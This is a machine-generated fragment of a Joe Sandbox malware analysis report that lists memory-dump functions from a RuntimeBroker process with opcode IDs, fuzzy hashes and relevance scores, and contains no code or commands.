                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 055081794403693b696b8339c6a4e692d81d4d9a7c55c5d92b1e10726f676801
                                                                                                    • Instruction ID: 09bc9557868eb326de4abc0465e9ccbdfe7e63f3ce217854a5830b43fc7cdf03
                                                                                                    • Opcode Fuzzy Hash: 055081794403693b696b8339c6a4e692d81d4d9a7c55c5d92b1e10726f676801
                                                                                                    • Instruction Fuzzy Hash: 1901A871E0828ACFEB64DFD4C4946ADBBF1FB15354F20413AC419AB698DB386585CF48
                                                                                                    Function 00007FFD9C1B37FA Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: b842df949301a3ce0f6172e3e9a6a32eecf31940badfbf9bb33c252169708028
                                                                                                    • Instruction ID: f1f5382161b2319fb00d604649c6c5f2e4c44bedcfbe6aa53445bd8cdea63afa
                                                                                                    • Opcode Fuzzy Hash: b842df949301a3ce0f6172e3e9a6a32eecf31940badfbf9bb33c252169708028
                                                                                                    • Instruction Fuzzy Hash: F1F0FF3091464DCFDB44EF68C849AEA7BF0FF18315F40466AE818D3154DB34E164CB81
                                                                                                    Function 00007FFD9BAD13A8 Relevance: .0, Instructions: 33COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 2bbd07c8b24b95b424cd382ee979f6933dd5b2bb3466c7c4a8e6b1f47ccc8f14
                                                                                                    • Instruction ID: 69336095fd108cd29cd0c57ab11e6203e56b814dce630378a53525bf07134849
                                                                                                    • Opcode Fuzzy Hash: 2bbd07c8b24b95b424cd382ee979f6933dd5b2bb3466c7c4a8e6b1f47ccc8f14
                                                                                                    • Instruction Fuzzy Hash: 58F0BD3091494D9FDF94EF58C449AAE7BE0FF68304F014466F81CC3261DA30E590CB80
                                                                                                    Function 00007FFD9C1B5D5D Relevance: .0, Instructions: 32COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 6f4507faec9c68bb12057e57ec33f234a4dd510948d0f6742d46a641f24b5e3a
                                                                                                    • Instruction ID: fab6493e2d737a1c2dc170700e7e98d3005587904658ad4fecbc045d4d1e3ca1
                                                                                                    • Opcode Fuzzy Hash: 6f4507faec9c68bb12057e57ec33f234a4dd510948d0f6742d46a641f24b5e3a
                                                                                                    • Instruction Fuzzy Hash: F8F0BE3199860E9AEB20BFA4D8045E9B7B0FF08308F00447AF49DD20C5DA30A2908B44
                                                                                                    Function 00007FFD9BAD06C8 Relevance: .0, Instructions: 30COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 20362e7e15a94d95141fcf846770031baea9f2dc9769a85e5e31d1fb2034d9dc
                                                                                                    • Instruction ID: 323dddd7e9344577f5fe3ffe138b0d192d2e0cf076e4a7743422de21aa819809
                                                                                                    • Opcode Fuzzy Hash: 20362e7e15a94d95141fcf846770031baea9f2dc9769a85e5e31d1fb2034d9dc
                                                                                                    • Instruction Fuzzy Hash: AAF0123091594E9FDB90EF64D8596FE77E0FF54304F414566E81CD3160DA70A6A0CB80
                                                                                                    Function 00007FFD9C1BA338 Relevance: .0, Instructions: 29COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: 71a65452f8754a637882aa1f07859719d40655d76f0c445cb7ece08ad7b4c7f6
                                                                                                    • Instruction ID: da42a7192f2b895429fc84be812431e27e3264bf734187410767ba24841d4b5a
                                                                                                    • Opcode Fuzzy Hash: 71a65452f8754a637882aa1f07859719d40655d76f0c445cb7ece08ad7b4c7f6
                                                                                                    • Instruction Fuzzy Hash: B9F0E731E0434A8FEB54DFD5C494AADB7F1EB56351F10813AC41AEB298DA386986CF40
                                                                                                    Function 00007FFD9C1B4BDF Relevance: .0, Instructions: 19COMMON
                                                                                                    Download Yara Rule
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2914509338.00007FFD9C1B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9C1B0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9c1b0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID:
                                                                                                    • API String ID:
                                                                                                    • Opcode ID: d23ee2fabf44939fc16a3f84a599423c57d9e0a40e4a863a6111e37a3da50c66
                                                                                                    • Instruction ID: d7a0c698f48ccd778f6e3ecfcfbbcae4b1df310083843aa7daf84c813fa4dc63
                                                                                                    • Opcode Fuzzy Hash: d23ee2fabf44939fc16a3f84a599423c57d9e0a40e4a863a6111e37a3da50c66
                                                                                                    • Instruction Fuzzy Hash: E0E0E675E0891E8EEB64DAD8D8642ED67F1FB58340F11412A900EE6289CA6414028F49

                                                                                                    Non-executed Functions

                                                                                                    Function 00007FFD9BAD09B0 Relevance: 5.2, Strings: 4, Instructions: 178COMMON
                                                                                                    Download Yara Rule
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.2907971060.00007FFD9BAD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD9BAD0000, based on PE: false
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_7ffd9bad0000_RuntimeBroker.jbxd
                                                                                                    Similarity
                                                                                                    • API ID:
                                                                                                    • String ID: c9$!k9$"s9$#{9
                                                                                                    • API String ID: 0-1692736845
                                                                                                    • Opcode ID: 7f71ed8f09d2a040804166f249e54281840e3c12423b0281bb22292a543f27f3
                                                                                                    • Instruction ID: 1cfaf543efabeea70f5d479527ae80e3e62a6043bd93ec1be23cd1b6263c3ac6
                                                                                                    • Opcode Fuzzy Hash: 7f71ed8f09d2a040804166f249e54281840e3c12423b0281bb22292a543f27f3
                                                                                                    • Instruction Fuzzy Hash: 1341BD02B0946705E23AB3FC78229F96B449FA937FB4843B7F45E8D0EB4D096085C2D5